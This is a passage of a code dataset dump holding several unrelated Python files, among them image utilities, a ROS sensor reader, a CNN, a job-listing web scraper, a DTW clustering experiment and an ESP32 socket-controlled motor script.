return index\n\n def write_weight(self, file_name):\n \"\"\"\n Function: write weights\n Input file_name: name of file\n \"\"\"\n file_name = 'fa-weight-' + file_name + '.csv'\n if exists(parent_dir_writer) == False:\n os.mkdir(parent_dir_writer)\n path = abspath(join(parent_dir_writer, file_name))\n pd_data = pd.DataFrame(self.weights)\n pd_data.to_csv(path, index=False, sep=',')\n","sub_path":"algorithm/olps/factor_awu.py","file_name":"factor_awu.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"322637106","text":"# -*- coding: utf-8 -*-\n# 3rd Party\nfrom __future__ import division\nimport logging\nlog = logging.getLogger('cc.lib.image')\n# django\nfrom django.conf import settings\ntry:\n import Image as Pil\n import ImageOps\nexcept ImportError:\n import PIL as Pil\n from PIL import ImageOps\n \n\ndef get_rgb_image(instance):\n img = Pil.open(instance.src.path)\n img.draft(\"RGB\", img.size)\n img = img.convert(\"RGB\")\n return img\n\ndef width_height(instance, path, width, height):\n img = get_rgb_image(instance)\n w, h = img.size\n if w > width:\n return rescale(instance, path, width, height)\n img.save( path, 'JPEG' , quality=90)\n\n\ndef ignore(instance, path, *args, **kwargs):\n img = get_rgb_image(instance)\n img.save( path, 'JPEG' , quality=90)\n\ndef crop(instance, path, width, height):\n img = get_rgb_image(instance)\n # a nice convenient function\n img = ImageOps.fit(img, size=(width,height), 
centering=(0.5,0.5), method=Pil.ANTIALIAS)\n img.save( path, 'JPEG' , quality=90)\n\ndef rescale(instance, path, width, height):\n img = get_rgb_image(instance)\n w, h = img.size\n if w > h:\n scale = width / w\n height = int(scale * h)\n else:\n scale = height / h\n width = int(scale * w)\n img = img.resize((width, height), Pil.ANTIALIAS)\n img.save( path, 'JPEG' , quality=90)\n \n","sub_path":"cc/lib/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"594075993","text":"#!/usr/bin/env python \n\n# TESTED RUN\n# python3 /home/crslab/catkin_ws/src/real_time_plot/scripts/aces_connect.py /dev/ttyUSB1\n\nimport serial\nimport numpy as np\nimport time\nimport scipy.io as sio\nimport rospy\nfrom std_msgs.msg import String\nimport sys\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\nclass AcesReader():\n def __init__(self, argv):\n\n self.b_order = sys.byteorder\n self.ser = serial.Serial(port = argv[1],baudrate=115200,bytesize=8,timeout=0.01,stopbits=serial.STOPBITS_ONE)\n print('Connected to: '+self.ser.portstr)\n self.plotting = False\n self.fn_sub = rospy.Subscriber(\"filename\", String, self.callback)\n self.pub = rospy.Publisher('aces_real_time', String, queue_size=10)\n self.t_window = time.time()\n # init plot stuff\n self.plot_tools_init()\n #self.update_plot()\n\n def load_FRANKA_fingers(self, left_finger_path, right_finger_path):\n LEFT= np.asarray(sio.loadmat(left_finger_path)['ACES_ROBOTIQ_LEFT_LUT'])\n RIGHT = np.asarray(sio.loadmat(right_finger_path)['ACES_ROBOTIQ_RIGHT_LUT'])\n return LEFT, RIGHT\n\n\n def plot_tools_init(self):\n self.LEFT_FINGER_MAP, self.RIGHT_FINGER_MAP = self.load_FRANKA_fingers('/home/crslab/panda_sim/aces_finger_not_catkin_pkg/ACES_ROBOTIQ_LEFT_LUT.mat','/home/crslab/panda_sim/aces_finger_not_catkin_pkg/ACES_ROBOTIQ_RIGHT_LUT.mat')\n self.stacked_finger_map = np.vstack((self.LEFT_FINGER_MAP,self.RIGHT_FINGER_MAP))\n self.stacked_finger_map = np.squeeze(self.stacked_finger_map, axis=1)\n self.recorded_nodes = list()\n self.base_LUT_2 = np.asarray(sio.loadmat('/home/crslab/aces_finger_not_catkin_pkg/ROBOTIQ_BASE_LUT_rev2.mat')['L2'])\n\n\n\n\n def produce_plots(self):\n ######\n #print('Right finger:', len(self.recorded_nodes))\n nodes_2, count_nodes_2 = np.unique(self.recorded_nodes,return_counts=True)\n\n #left_C_2 = np.zeros((39,1))\n right_C_2 = np.zeros((39,1))\n #print(len(nodes_2))\n\n # can be optimized further only for one finger\n for n in range(len(nodes_2)):\n # if nodes_2[n] in self.LEFT_FINGER_MAP:\n # ind = np.where(self.LEFT_FINGER_MAP==nodes_2[n])\n # left_C_2[ind] = count_nodes_2[n]\n if nodes_2[n] in self.RIGHT_FINGER_MAP:\n ind = np.where(self.RIGHT_FINGER_MAP==nodes_2[n])\n right_C_2[ind] = count_nodes_2[n]\n\n\n str_right_C_2 = ''\n for a in right_C_2:\n str_right_C_2 += str(a[0]) + ','\n\n self.pub.publish(str_right_C_2)\n\n\n\n self.recorded_nodes = list()\n\n def callback(self, data):\n if self.plotting and data.data == 'stop':\n print(\"Stop recording\")\n self.plotting=False\n else:\n print('Start plotting')\n self.plotting=True\n\n def bytereader(self, byteobject):\n x = bin(int.from_bytes(byteobject,byteorder=self.b_order)) #python3\n #print('x', x)\n if len(x) == 10: # negative to have up to 10 values\n x = x[0:2]+x[3:]\n x = 80 - int(x,2)\n isneg = 1\n elif len(x) == 3 and x[-1]=='0': # For no value zeros\n x = x[:]\n x = int(x,2)\n isneg = 0\n else:\n x = 
x[0:2]+'0'*(10-len(x))+x[2:]\n x = 80 - int(x,2)\n isneg = 0\n return np.int8(x), isneg\n\n def update_plot(self):\n self.produce_plots()\n \nrospy.init_node('real_time_plotting', anonymous=True)\naces = AcesReader(sys.argv)\n\n\n\nwhile True:\n\n # read aces\n b = aces.ser.read()\n #print(len(a))\\\n #print(str(b))\n\n add = False\n if rospy.is_shutdown():\n break\n\n if len(b) > 0:\n val, polarity = aces.bytereader(b)\n add = True\n\n # plot within specified time\n if time.time() - aces.t_window >= 0.05:\n #print(time.time() - aces.t_window)\n aces.t_window = time.time()# + 0.25\n #print('here')\n #print(add)\n #print(len(aces.recorded_nodes))\n aces.update_plot()\n else:\n if add:\n #print('here2', count)\n aces.recorded_nodes.append(val)\n\naces.ser.close() # <- PLEASE RUN THIS AFTER YOU CTRL-C OR STOP. IF NOT YOU NEED TO RESTART YOUR CONSOLE.","sub_path":"scripts/aces_connect.py","file_name":"aces_connect.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"546985631","text":"import pathlib\nfrom setuptools import find_packages, setup\n\nHERE = pathlib.Path(__file__).parent\nREADME = (HERE / 'README.md').read_text()\n\nsetup(\n name=\"adou\",\n version=\"0.0.0\",\n description=\"Just some typical approaches for document understanding and related tasks.\",\n long_description=README,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/dpsnewailab/adou\",\n author=\"DPS-AI Lab\",\n author_email=\"aiteam@dps.com.vn\",\n license=\"MIT\",\n classifiers=[\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.7\",\n ],\n packages=find_packages(exclude=('example', 'test')),\n include_package_data=True,\n install_requires=['torch==1.4.0',\n 'torchvision==0.5.0',\n 'tqdm==4.32.2'],\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"38005698","text":"# coding: utf-8\n\"\"\"\nconvolutional neural network\n\"\"\"\nimport numpy as np\n\nfrom .layers import *\nfrom .layer_utils import *\n\n\nclass ThreeLayerConvNet(object):\n \"\"\"\n A three-layer convolutional network with the following architecture:\n\n conv - relu - 2x2 max pool - affine - relu - affine - softmax\n\n The network operates on minibatches of data that have shape (N, C, H, W)\n consisting of N images, each with height H and width W and with C input\n channels.\n \"\"\"\n\n def __init__(self, input_dim=(3, 32, 32), num_filters=32, filter_size=7,\n hidden_dim=100, num_classes=10, weight_scale=1e-3, reg=0.0,\n dtype=np.float32):\n \"\"\"\n Initialize a new network.\n\n arch: conv -> relu -> max_pooling -> fc -> relu -> fc\n\n Inputs:\n - input_dim: Tuple (C, H, W) giving size of input data\n - num_filters: Number of filters to use in the convolutional layer\n - filter_size: Size of filters to use in the convolutional layer\n - hidden_dim: Number of units to use in the fully-connected hidden layer\n - num_classes: Number of scores to produce from the final affine layer.\n - weight_scale: Scalar giving standard deviation for random initialization\n of weights.\n - reg: Scalar giving L2 regularization strength\n - dtype: numpy datatype to use for computation.\n \"\"\"\n self.params = {}\n self.reg = reg\n self.dtype = dtype\n\n self.params['W1'] = np.random.randn(num_filters, input_dim[0], filter_size, 
filter_size) * weight_scale\n        self.params['b1'] = np.zeros(num_filters)\n\n        self.params['W2'] = np.random.randn(int(input_dim[1]*input_dim[2]/4*num_filters), hidden_dim) * weight_scale\n        self.params['b2'] = np.zeros(hidden_dim)\n\n        self.params['W3'] = np.random.randn(hidden_dim, num_classes) * weight_scale\n        self.params['b3'] = np.zeros(num_classes)\n\n        for k, v in self.params.items():\n            self.params[k] = v.astype(dtype)\n\n    def loss(self, X, y=None):\n        W1, b1 = self.params['W1'], self.params['b1']\n        W2, b2 = self.params['W2'], self.params['b2']\n        W3, b3 = self.params['W3'], self.params['b3']\n\n        filter_size = W1.shape[2]\n        conv_param = {'stride': 1, 'pad': (filter_size - 1) // 2}\n        pool_param = {'pool_height': 2, 'pool_width': 2, 'stride': 2}\n\n        conv_out, conv_cache = conv_relu_forward(X, W1, b1, conv_param)\n        max_pool_out, max_pool_cache = max_pool_forward_naive(conv_out, pool_param)\n        aff1_out, aff1_cache = affine_relu_forward(max_pool_out, W2, b2)\n        scores, aff2_cache = affine_forward(aff1_out, W3, b3)\n\n        if y is None:\n            return scores\n\n        loss, grads = 0, {}\n        loss, dx = softmax_loss(scores, y)\n        dx, dW3, db3 = affine_backward(dx, aff2_cache)\n        dx, dW2, db2 = affine_relu_backward(dx, aff1_cache)\n        dx = max_pool_backward_naive(dx, max_pool_cache)\n        dx, dW1, db1 = conv_relu_backward(dx, conv_cache)\n\n        grads['W1'] = dW1\n        grads['b1'] = db1\n        grads['W2'] = dW2\n        grads['b2'] = db2\n        grads['W3'] = dW3\n        grads['b3'] = db3\n\n        return loss, grads\n","sub_path":"ml/nn/saiph/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"146947768","text":"import heapq\nclass Solution(object):\n    def leastInterval(self, tasks, n):\n        t = 0\n        hashmap = {}\n        for task in tasks:\n            hashmap[task] = hashmap.get(task, 0)+1\n        min_heap = []\n        for key, value in hashmap.items():\n            min_heap.append([0, key, value])\n        while min_heap:\n            heapq.heapify(min_heap)\n            time, task, count = heapq.heappop(min_heap)\n            t += time+1\n            for i in range(len(min_heap)):\n                min_heap[i][0] = 0 if min_heap[i][0] <= time+1 else min_heap[i][0] - time -1\n            count -= 1\n            if count > 0:\n                heapq.heappush(min_heap, [n, task, count])\n        return t\n'''\nI couldn't solve this one on my own; it turns out the trick is a greedy strategy.\n'''\na = Solution()\ntasks = [\"A\",\"A\",\"A\",\"B\",\"B\",\"B\"]\nn = 2\nprint(a.leastInterval(tasks, n))","sub_path":"All_about_sorted/CountingSort/Greedy_stunk/Leetcode_621/lc621.py","file_name":"lc621.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"264260019","text":"# -*- coding: utf-8 -*-\nfrom scrapy import Spider,FormRequest\nimport json\nfrom Collector.items import JobItem\n\nclass LagouSpider(Spider):\n    name=\"lagou\"\n    pn=1\n    allowed_domains=[\"lagou.com\"]\n    start_urls=[\n        'http://www.lagou.com/jobs/positionAjax.json?px=new',\n    ]\n\n    def parse(self,response):\n\n        content=json.loads(response.text).get('content',{}).get('positionResult',{}).get('result',[])\n        if(content):\n            item=JobItem()\n            self.pn+=1\n            for _ in content:\n                item['leaderName']=_.get('leaderName','None')\n                item['companySize']=_.get('companySize','None')\n                item['workYear']=_.get('workYear','None')\n                item['education']=_.get('education','None')\n                item['financeStage']=_.get('financeStage','None')\n                item['pvScore']=_.get('pvScore','None')\n                item['city']=_.get('city','None')\n                item['companyLogo']=_.get('companyLogo','None')\n                item['companyId']=_.get('companyId','None')\n                item['industryField']=_.get('industryField','None')\n                item['companyLabelList']=_.get('companyLabelList','None')\n                item['formatCreateTime']=_.get('formatCreateTime','None')\n                item['salary']=_.get('salary','None')\n                item['positionName']=_.get('positionName','None')\n                item['companyName']=_.get('companyName','None')\n                item['jobNature']=_.get('jobNature','None')\n                item['positionFirstType']=_.get('positionFirstType','None')\n                item['createTime']=_.get('createTime','None')\n                item['positionId']=_.get('positionId','None')\n                item['companyShortName']=_.get('companyShortName','None')\n                item['positionType']=_.get('positionType','None')\n                item['positionAdvantage']=_.get('positionAdvantage','None')\n                yield item\n        \n        data={\n            'first':'false',\n            'pn':str(self.pn),\n            'kd':'', \n        }\n        yield FormRequest(self.start_urls[0],formdata=data) # parse is invoked as the callback by default; Request cannot be used here\n","sub_path":"Collector/spiders/lagou.py","file_name":"lagou.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"162315616","text":"import numpy as np\nimport tensorflow as tf\n\n# Import MNIST Data\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n# Store the MNIST data into the tmp data\nmnist = input_data.read_data_sets(\"mnist_data/\", one_hot=True)\n\n# Using a subset of the data to ensure that we can run faster. \ntraining_digits, training_labels = mnist.train.next_batch(5000)\ntest_digits, test_labels = mnist.test.next_batch(200)\n\ntraining_digits_pl = tf.placeholder(\"float\", [None, 784])\ntest_digits_pl = tf.placeholder(\"float\", [784])\n\n# Nearest neighbour calculation using the L1 distance\nl1_distance = tf.abs(tf.add(training_digits_pl, tf.negative(test_digits_pl)))\n\ndistance = tf.reduce_sum(l1_distance, axis=1)\n\n# Prediction - Get min distance index (nearest neighbour)\npred = tf.arg_min(distance, 0)\n\naccuracy = 0\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n    sess.run(init)\n    for i in range(len(test_digits)):\n        # Get NN neighbour\n        nn_index = sess.run(pred, \\\n            feed_dict={training_digits_pl:training_digits, test_digits_pl:test_digits[i,:]})\n\n        print(\"Test \", i, \"Prediction \", np.argmax(training_labels[nn_index]), \"True Label \", np.argmax(test_labels[i]))\n\n        # Calculate the accuracy\n        if np.argmax(training_labels[nn_index]) == np.argmax(test_labels[i]):\n            accuracy += 1./len(test_digits)\n\n\nprint(\"Done !\")\nprint(\"Accuracy : \", accuracy)","sub_path":"TF_Regression_KNN/m5_knn_mnist.py","file_name":"m5_knn_mnist.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"428350588","text":"from Methods.Util import *\n\n# This file implements quantization-based clustering for LB_MV.\n# It is the offline candidate clustering version, with adaptive cluster numbers.\n# It does not use X0 at all.\n\n# The dataCollection function saves the following:\n#     the lower bounds in each individual directory: an nd array\n#     the DTW distances and skips and coreTime in each individual directory: a text file\n#     the setup time and total lower bound time of each dataset in one overall file in AllDataSets directory: an nd array\n\n\ndef getLBs (dataset, query, reference, w, dim, K=4, Q=2):\n    nqueries = len(query)\n    length=len(query[0])\n    nrefs=len(reference)\n    windowSize = w if w <= length / 2 else int(length / 2)\n    print(\"W=\" + str(windowSize) + '\\n')\n\n    # Calculate slices range\n    print(\"Bounding boxes finding 
Start!\")\n start=time.time()\n bboxes = [findBoundingBoxes(np.array(ref), K, windowSize, Q) for ref in reference]\n end=time.time()\n nboxes=0\n for r in range(len(reference)):\n boxes = bboxes[r]\n nboxes += sum([len(p) for p in boxes])\n setuptime2003cluster_q=end-start\n print(\"Bounding boxes Done!\")\n\n # Calculate Lower Bounds\n print(\"Cluster-2003-quick lower bounds. Start!\")\n start=time.time()\n lbs_2003_cluster_q = [getLB_oneQ (query[ids1], reference, dim, bboxes) for ids1 in range(len(query))]\n end=time.time()\n lbtime2003cluster_q=end-start\n # np.save(pathUCRResult+ dataset + \"/\" + str(w) + \"/\" + str(nqueries_g) + \"X\" +\n # str(nreferences_g) + \"_X3_\"+ \"K\"+ intlist2str(K) +\"Q\" + intlist2str(Q) + \"_lbs.npy\", lbs_2003_cluster_q)\n print(\"Cluster-2003-quick Done!\" + '\\n')\n\n# thistimes = [setuptime2003cluster_q, lbtime2003cluster_q]\n\n# np.save(pathUCRResult+ dataset + \"/\" + str(w) + \"/\" + str(nqueries_g) + \"X\" +\n# str(nreferences_g) + \"_X3_\"+ \"K\"+ intlist2str(K) +\"Q\" + intlist2str(Q) + \"_times.npy\", thistimes)\n\n# allTimes_g.append([setuptime2003cluster_q, lbtime2003cluster_q])\n\n return lbs_2003_cluster_q, [setuptime2003cluster_q, lbtime2003cluster_q], nboxes\n\ndef findBoundingBoxes (ref, K, W, Q):\n '''\n find the K bounding boxes for each window in ref with quantizations\n :param ref: a data frame holding a reference series\n :param K: the number of bounding boxes\n :param W: the window size\n :param Q: the number of cells in each dimension\n :return: a len(ref)*K array with each element [ [dim low ends] [dim high ends]]\n '''\n length = ref.shape[0]\n dims = ref.shape[1]\n allBoxes = []\n for idx in range(length):\n# nonEmptyCells = {}\n cellMembers = {}\n bboxes = []\n awindow = ref[(idx - W if idx - W >= 0 else 0):(idx + W if idx + W <= length else length)]\n overall_ls = [min(np.array(awindow)[:,idd]) for idd in range(dims)]\n overall_us = [max(np.array(awindow)[:, idd]) for idd in range(dims)]\n cells = [1+int((overall_us[idd] - overall_ls[idd])*Q) for idd in range(dims)]\n celllens = [ (overall_us[idd] - overall_ls[idd])/cells[idd]+0.00000001 for idd in range(dims) ]\n for e in awindow:\n thiscell = str([int( (e[idd]-overall_ls[idd])/celllens[idd]) for idd in range(dims)])\n if thiscell in cellMembers:\n cellMembers[thiscell].append(e)\n else:\n cellMembers[thiscell] = [e]\n# if len(cellMembers.keys())>K:\n# bboxes=[[overall_ls, overall_us]]\n# else:\n for g in cellMembers:\n l = [min(np.array(cellMembers[g])[:, idd]) for idd in range(dims)]\n u = [max(np.array(cellMembers[g])[:, idd]) for idd in range(dims)]\n bboxes.append([l, u])\n if len(bboxes)>K:\n # combine all boxes except the first K-1 boxes\n sublist = bboxes[K-1:]\n combinedL = [min([ b[0][idd] for b in sublist]) for idd in range(dims)]\n combinedU = [max([b[1][idd] for b in sublist]) for idd in range(dims)]\n bboxes= bboxes[0:K-1]\n bboxes.append([combinedL, combinedU])\n allBoxes.append(bboxes)\n return np.array(allBoxes)\n\n\ndef getLB_oneQ (X, others, dim, sl_bounds):\n # X is one series, others is all references, dim is dimensions, sl_bounds has all the bounding boxes of all reference series\n lbs = []\n for idy, s2 in enumerate(others):\n temps = []\n LB_sum = 0\n slboundsOneY = sl_bounds[idy]\n for idx, x in enumerate(X):\n numBoxes = len(slboundsOneY[idx])\n oneYbounds=[]\n for idbox in range(numBoxes):\n l = slboundsOneY[idx][idbox][0]\n u = slboundsOneY[idx][idbox][1]\n temp = math.sqrt(sum([(x[idd]-u[idd]) ** 2 if (x[idd] > u[idd]) else (l[idd]-x[idd])**2 
if (x[idd] < l[idd]) else 0\n for idd in range(dim)]))\n oneYbounds.append(temp)\n LB_sum+=min(oneYbounds)\n lbs.append(LB_sum)\n return lbs\n\ndef dataCollection(pathUCRResult, datasetsNameFile, datasetsSizeFile, datapath, maxdim = 5, nqueries = 3, nreferences = 20, windows = [20], Ks=[6], Qs=[2]):\n datasets = []\n # with open(\"Results/UCR/allDataSetsNames.txt\",'r') as f:\n with open(datasetsNameFile, 'r') as f:\n for line in f:\n datasets.append(line.strip())\n f.close()\n datasize = []\n # with open(\"Results/UCR/size.txt\",'r') as f:\n with open(datasetsSizeFile, 'r') as f:\n for line in f:\n datasize.append(int(line.strip()))\n f.close()\n\n# datasets=[\"ArticularyWordRecognition\",\"AtrialFibrillation\"]\n\n # # create directories if necessary\n # for datasetName in datasets:\n # for w in windows:\n # dir = pathUCRResult+\"\" + datasetName + \"/\" + str(w)\n # if not os.path.exists(dir):\n # os.makedirs(dir)\n\n #times = np.load(pathUCRResult+\"\" + '/' + str(nqueries) + \"X\" + str(nreferences) + \"_times_2003_cluster.npy\")\n\n # get # of skips quickly\n # for datasetName in datasets:\n # for w in windows:\n # lb_quant, lb_2003 = load_saved_lb(datasetName, w)\n # get_skips_quick(datasetName, w, lb_quant, lb_2003, 3)\n # print(\"get_skips_quick is done.\")\n\n ################\n allTimes = []\n allnboxes = []\n for idxset, dataset in enumerate(datasets):\n print(dataset+\" Start!\")\n assert(datasize[idxset]>=nqueries+nreferences)\n stuff = loadUCRData_norm_xs(datapath, dataset,nqueries+nreferences)\n size = len(stuff)\n length = stuff[0].shape[0]\n dim = min(stuff[0].shape[1], maxdim)\n print(\"Size: \"+str(size))\n print(\"Dim: \"+str(dim))\n print(\"Length: \"+str(length))\n samplequery = stuff[:nqueries]\n samplereference = stuff[nqueries:nreferences+nqueries]\n # -------------------------------------------------\n if (nqueries * nreferences == 0): # all series to be used\n qfrac = 0.3\n samplequery = stuff[:int(size * qfrac)]\n samplereference = stuff[int(size * qfrac):]\n # -------------------------------------------------\n\n print(dataset+\": \"+ str(nqueries)+\" queries, \"+ str(nreferences)+ \" references.\" +\n \" Total dtw: \"+str(nqueries*nreferences))\n\n query = [q.values[:, :dim] for q in samplequery]\n reference = [r.values[:, :dim] for r in samplereference]\n\n for w in windows:\n for K in Ks:\n for Q in Qs:\n print(\"K=\"+str(K)+\" Q=\"+str(Q))\n lbs_X3, times, nboxes = getLBs (dataset, query, reference, w, dim, K, Q)\n allnboxes.append(nboxes)\n np.save(pathUCRResult + dataset + '/d' + str(maxdim) + '/w' + str(w) + \"/\"\n + str(nqueries) + \"X\" + str(nreferences) + \"_X3_K\" + str(K) + \"Q\" + str(Q) + \"_lbs.npy\", lbs_X3)\n allTimes.append(times)\n results = get_skips(dataset, maxdim, w, lbs_X3, query, reference, pathUCRResult, nqueries,nreferences)\n if findErrors(dataset, maxdim, w, nqueries, nreferences, results, pathUCRResult):\n print('Wrong Results!! 
Dataset: ' + dataset)\n exit()\n with open(pathUCRResult + dataset + '/' + 'd' + str(maxdim) + '/w' + str(w) + \"/\" + str(\n nqueries) + \"X\" + str(\n nreferences) + \"_\" + \"X3_K\" + str(K) + \"Q\" + str(Q) + \"_results\" + \".txt\", 'w') as f:\n for r in results:\n f.write(str(r) + '\\n')\n print(dataset+\" Done!\"+'\\n'+'\\n')\n\n np.save(pathUCRResult+\"\" + '/_AllDataSets/' + \"/d\"+ str(maxdim) + \"/\" + str(nqueries)+\"X\"+str(nreferences)\n + \"_X3_\"+\"w\" + intlist2str(windows)+ \"K\"+intlist2str(Ks)+\"Q\"+intlist2str(Qs) + \"_times.npy\", np.array(allTimes))\n np.save(pathUCRResult+\"\" + '/_AllDataSets/' + \"/d\"+ str(maxdim) + \"/\" + str(nqueries)+\"X\"+str(nreferences)\n + \"_X3_\"+\"w\" + intlist2str(windows)+ \"K\"+intlist2str(Ks)+\"Q\"+intlist2str(Qs) + \"_nboxes.npy\", np.array(allnboxes))\n\n print(\"Data collection is done.\")\n\ndef dataProcessing(datasetsNameFile, pathUCRResult=\"../Results/UCR/\", maxdim = 5, nqueries = 3, nreferences = 20, windows = [20], Ks=[6], Qs=[2],machineRatios=[1,1]):\n datasets = []\n # with open(pathUCRResult+\"allDataSetsNames.txt\",'r') as f:\n with open(datasetsNameFile, 'r') as f:\n for line in f:\n datasets.append(line.strip())\n f.close()\n window = windows[0]\n rdtw = machineRatios[0]\n rother = machineRatios[1]\n t1dtw = loadt1dtw(pathUCRResult, maxdim, window)\n\n# datasets = [\"ArticularyWordRecognition\", \"AtrialFibrillation\"]\n\n ndatasets = len(datasets)\n\n # compute speedups\n x3setupLBtimes = np.load(\n pathUCRResult + '_AllDataSets/' + 'd' + str(maxdim) + \"/\" + str(nqueries) + \"X\" + str(nreferences)\n + \"_X3_w\" + intlist2str(windows) + \"K\" + intlist2str(Ks) + \"Q\" + intlist2str(Qs)+\"_times.npy\")\n x3tLB = x3setupLBtimes[:,1]\n tCore = []\n skips = []\n ## -------------------\n NPairs = []\n if nqueries * nreferences == 0:\n actualNQNRs = np.loadtxt(pathUCRResult + '/usabledatasets_nq_nref.txt').reshape((-1, 2))\n for i in range(len(datasets)):\n actualNQ = actualNQNRs[i][0]\n actualNR = actualNQNRs[i][1]\n NPairs.append(actualNQ * actualNR)\n ## -------------------\n for dataset in datasets:\n for K in Ks:\n for Q in Qs:\n results = readResultFile(\n pathUCRResult + dataset + '/d' + str(maxdim) + \"/w\" + str(windows[0]) + \"/\" + str(nqueries) + \"X\" + str(\n nreferences) + \"_X3_K\" + str(K) + \"Q\"+str(Q)+\"_results.txt\")\n tCore.append(sum(results[:, 3]))\n skips.append(sum(results[:, 2]))\n tCore = np.array(tCore).reshape((ndatasets, -1))\n skips = np.array(skips).reshape((ndatasets, -1))\n\n tCorePlus = tCore + x3tLB.reshape((ndatasets,-1))\n tDTW = np.tile(t1dtw[0:ndatasets], (skips.shape[1], 1)).transpose() * ((skips - NPairs) * -1)\n tsum = rother * tCorePlus + rdtw * tDTW\n tsum_min = np.min(tsum, axis=1)\n setting_chosen = np.argmin(tsum,axis=1)\n skips_chosen = np.array( [skips[i,setting_chosen[i]] for i in range(skips.shape[0])] )\n overhead = rother* np.array([tCorePlus[i,setting_chosen[i]] for i in range(tCorePlus.shape[0])])\n speedups = (rdtw * t1dtw[0:ndatasets] * NPairs) / tsum_min\n overheadrate = overhead/(rdtw * t1dtw[0:ndatasets] * NPairs)\n\n np.save(pathUCRResult + \"_AllDataSets/\" + 'd' + str(maxdim) + '/' + str(nqueries) + \"X\" + str(nreferences) +\n \"_X3_w\" + str(window) + \"K\" + intlist2str(Ks) + \"Q\" + intlist2str(Qs) + '_speedups.npy', speedups)\n np.save(pathUCRResult + \"_AllDataSets/\" + 'd' + str(maxdim) + '/' + str(nqueries) + \"X\" + str(nreferences) +\n \"_X3_w\" + str(window) + \"K\" + intlist2str(Ks) + \"Q\" + intlist2str(Qs) + '_skipschosen.npy', 
skips_chosen)\n    np.save(pathUCRResult + \"_AllDataSets/\" + 'd' + str(maxdim) + '/' + str(nqueries) + \"X\" + str(nreferences) +\n            \"_X3_w\" + str(window) + \"K\" + intlist2str(Ks) + \"Q\" + intlist2str(Qs) + '_settingchosen.npy', setting_chosen)\n    np.save(pathUCRResult + \"_AllDataSets/\" + 'd' + str(maxdim) + '/' + str(nqueries) + \"X\" + str(nreferences) +\n            \"_X3_w\" + str(window) + \"K\" + intlist2str(Ks) + \"Q\" + intlist2str(Qs) + '_overheadrate.npy', overheadrate)\n\n    return 0\n\n\n###############\nif __name__ == \"__main__\":\n    datapath= \"/Users/xshen/Kids/DanielShen/Research/DTW/Triangle/workshop/TriangleDTW/Data/Multivariate_pickled/\"\n    pathUCRResult = \"../Results/UCR/\"\n    datasetsNameFile = pathUCRResult+\"allDataSetsNames_no_EigenWorms.txt\"\n    datasetsSizeFile = pathUCRResult+\"size_no_EigenWorms.txt\"\n\n    maxdim_g = 5\n    nqueries_g = 3\n    nreferences_g = 20\n    Ks_g = [4, 6, 8]\n    Qs_g = [2, 3, 4]\n    windows_g = [20]\n    dataCollection(pathUCRResult, datasetsNameFile, datasetsSizeFile, datapath, maxdim_g,nqueries_g,nreferences_g,windows_g,Ks_g,Qs_g)\n    dataProcessing(datasetsNameFile, pathUCRResult, maxdim_g,nqueries_g,nreferences_g,windows_g,Ks_g,Qs_g)\n\n    print(\"End\")","sub_path":"Methods/X3.py","file_name":"X3.py","file_ext":"py","file_size_in_byte":13271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"524844113","text":"import usocket as socket\r\nimport utime as time\r\nfrom machine import Pin, PWM\r\nimport sys\r\n\r\n\r\nessid = 'SSID'\r\nessid_password = 'PASSWORD'\r\n\r\n\r\nfrom nettools import wlan_connect,wlan_disconnect\r\n\r\ntry:\r\n    wlan_connect(essid,essid_password,timeout=15)\r\nexcept:\r\n    print('Failed to connect to WiFi')\r\n\r\nHOST = '0.0.0.0' \r\nPORT = 18000 \r\ntime.sleep(2)\r\n\r\n\r\n\r\ndef DataReceive(conn):\r\n    \r\n    while True:\r\n        data = conn.recv(1024)\r\n        if not data:\r\n            return None\r\n        return data\r\n\r\n\r\ndef DataAnalyzer(data):\r\n    if data.decode() == \"commande\":\r\n        try:\r\n            ActionManager()\r\n        except:\r\n            return False\r\n    return 'Done'\r\n\r\n\r\ndef ActionManager():\r\n    #Cleaning process\r\n    cycle = 0\r\n    max = 0 # To be replaced by the length of the arm along the table\r\n    for cycle in range(0, max):\r\n        PWM(Pin(15)).duty(cycle)\r\n    return None\r\n\r\n\r\n    \r\ndef main():\r\n    while True:\r\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n        s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\r\n        s.bind((HOST, PORT))\r\n        s.listen(1)\r\n        print(\"Waiting for connection\")\r\n        conn, addr = s.accept()\r\n        print('Connected by', addr)\r\n\r\n        data = DataReceive(conn)\r\n        if DataAnalyzer(data) == False:\r\n            print(\"An error occurred\")\r\n            break\r\n        conn.sendall(b'Done')\r\n        s.close()\r\n\r\n    \r\ndef alert():\r\n    sys.exit()\r\n\r\nmain()","sub_path":"ESP32/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
